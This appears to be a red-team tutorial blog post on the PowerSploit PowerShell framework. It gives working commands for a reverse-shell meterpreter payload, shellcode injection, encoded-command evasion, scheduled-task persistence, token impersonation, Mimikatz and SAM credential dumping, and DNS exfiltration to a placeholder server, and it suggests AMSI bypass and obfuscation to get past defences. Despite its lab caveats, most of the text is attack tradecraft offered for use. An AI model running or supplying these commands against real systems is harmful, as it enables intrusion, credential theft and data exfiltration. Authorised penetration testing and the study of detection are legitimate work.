⚠️ Note: PowerSploit is no longer actively maintained and many of its modules are easily detected by modern EDR and antivirus solutions. It remains a valuable tool for learning and experimentation but may require customization or obfuscation to be usable in real-world red team engagements.

Greetings, fellow red teamers and penetration testers! In today’s highly interconnected world, offensive security has evolved significantly. With new tools and techniques appearing regularly, staying ahead of the curve is essential. One powerful framework that continues to hold educational value is PowerSploit—a collection of PowerShell modules for offensive security operations.

In this article, we’ll dive into PowerSploit, explore its capabilities, and provide real-world examples to help you sharpen your offensive tradecraft. Let’s get into it.

What is PowerSploit?

PowerSploit is an open-source project developed by security researchers and enthusiasts. It’s a collection of PowerShell scripts and modules designed to support red teamers and penetration testers in post-exploitation, privilege escalation, persistence, and recon tasks. Its strength lies in flexibility and ease of use in Windows environments—especially where PowerShell is already present.

While the tool is aging and not stealthy out-of-the-box, it remains useful for learning offensive PowerShell concepts and testing detection capabilities.

Setting up PowerSploit

To get started with PowerSploit:

  1. Clone the GitHub repository:

    git clone https://github.com/PowerShellMafia/PowerSploit.git

  2. Import the desired module in PowerShell:

    cd PowerSploit
Import-Module .\Exfiltration\Invoke-Mimikatz.ps1

💡 You can also download and import individual scripts from the GitHub repo if you prefer not to clone the full project.

PowerSploit Modules

PowerSploit is divided into six main module categories:

  • Code Execution
  • Script Modification
  • Persistence
  • Privilege Escalation
  • Reconnaissance
  • Exfiltration

Let’s look at each category in detail.

🧨 Code Execution

These modules allow you to execute arbitrary code on a target system.

  • Invoke-Shellcode: Injects shellcode into memory.
  • Invoke-DllInjection: Injects a DLL into a running process.
  • Invoke-ReflectivePEInjection: Reflectively loads PE files into memory (DLL/EXE), avoiding disk writes.

Example: Deploying a Reverse Shell

Generate shellcode using msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.10 LPORT=443 -f powershell

Then execute it:

Invoke-Shellcode -Shellcode 'YOUR_GENERATED_SHELLCODE' -Force

⚠️ Shellcode execution via PowerShell is easily detected by modern EDR tools. This is best used for learning or in controlled labs.

🧪 Script Modification

These modules help evade AV and execution policies.

  • Out-EncodedCommand: Encodes a command for powershell.exe -EncodedCommand.
  • Out-CompressedDll: Compresses DLLs for use with reflective loaders.

Example: Encoded Execution

$command = 'Get-Process'
$encodedCommand = Out-EncodedCommand -Command $command

powershell.exe -EncodedCommand $encodedCommand

⚠️ EncodedCommand is a well-known bypass and flagged in most environments. This example is for educational purposes only.

🛡️ Persistence

Maintain access after initial compromise.

  • New-UserPersistenceOption: User-level persistence (startup folder, registry).
  • New-ElevatedPersistenceOption: System-level persistence (services, scheduled tasks).

Example: Daily Scheduled Task

New-UserPersistenceOption -Command "powershell.exe -Command 'YOUR_PAYLOAD_COMMAND'" -Frequency Daily -At "12:00"

🚩 Privilege Escalation

Gain higher privileges on a compromised host.

  • Invoke-TokenManipulation: Lists and impersonates access tokens.
  • PowerUp: Scans for common privilege escalation opportunities.

Example: Token Impersonation

First, enumerate impersonation candidates:

Invoke-TokenManipulation -Enumerate

Then impersonate a token:

Invoke-TokenManipulation -Impersonate

🎯 There is no -Username parameter. The module impersonates based on available tokens.

🕵️ Reconnaissance

Gather info about the environment.

  • Get-NetUser: Lists domain users.
  • Get-NetComputer: Lists computers in the domain.
  • Get-NetShare: Lists shared folders.

Example: Enumerate Domain Users

Get-NetUser -Filter *

📤 Exfiltration

Extract data stealthily.

  • Invoke-Mimikatz: Extracts credentials from memory.
  • Invoke-PowerDump: Dumps local SAM password hashes.
  • Out-DnsTxt: Exfiltrates data via DNS TXT records.

Example: DNS Exfiltration

Out-DnsTxt -Data "SENSITIVE_DATA" -DnsServer "YOUR_DNS_SERVER"

🛑 EDRs will often block or detect this activity unless heavily obfuscated or tunneled.

Real-World Use Cases

Here are a few situations where PowerSploit can be integrated into a red team workflow:

🔒 Privilege Escalation via Tokens

Invoke-TokenManipulation -Enumerate
Invoke-TokenManipulation -Impersonate

Use after initial compromise to move laterally or elevate privileges.

🕸️ Lateral Movement with PowerShell Remoting

Get-NetComputer -Filter *
Enter-PSSession -ComputerName "TARGET_COMPUTER"

Requires PSRemoting to be enabled and accessible.

🧬 Credential Dumping with Mimikatz

Invoke-Mimikatz

⚠️ Detected instantly in modern environments. Use AMSI bypass or load via obfuscated stager if testing defenses.

Final Thoughts

PowerSploit remains one of the most instructive frameworks for understanding offensive PowerShell. While its techniques are dated in some areas, its modular approach and code clarity make it an outstanding training and testing resource.

For real-world operations, expect to modify, obfuscate, and combine PowerSploit modules with custom tradecraft or C2 frameworks like Empire, Covenant, or Cobalt Strike.

Explore, adapt, and test—always in a legal and ethical environment.

Stay sharp out there, and good hunting.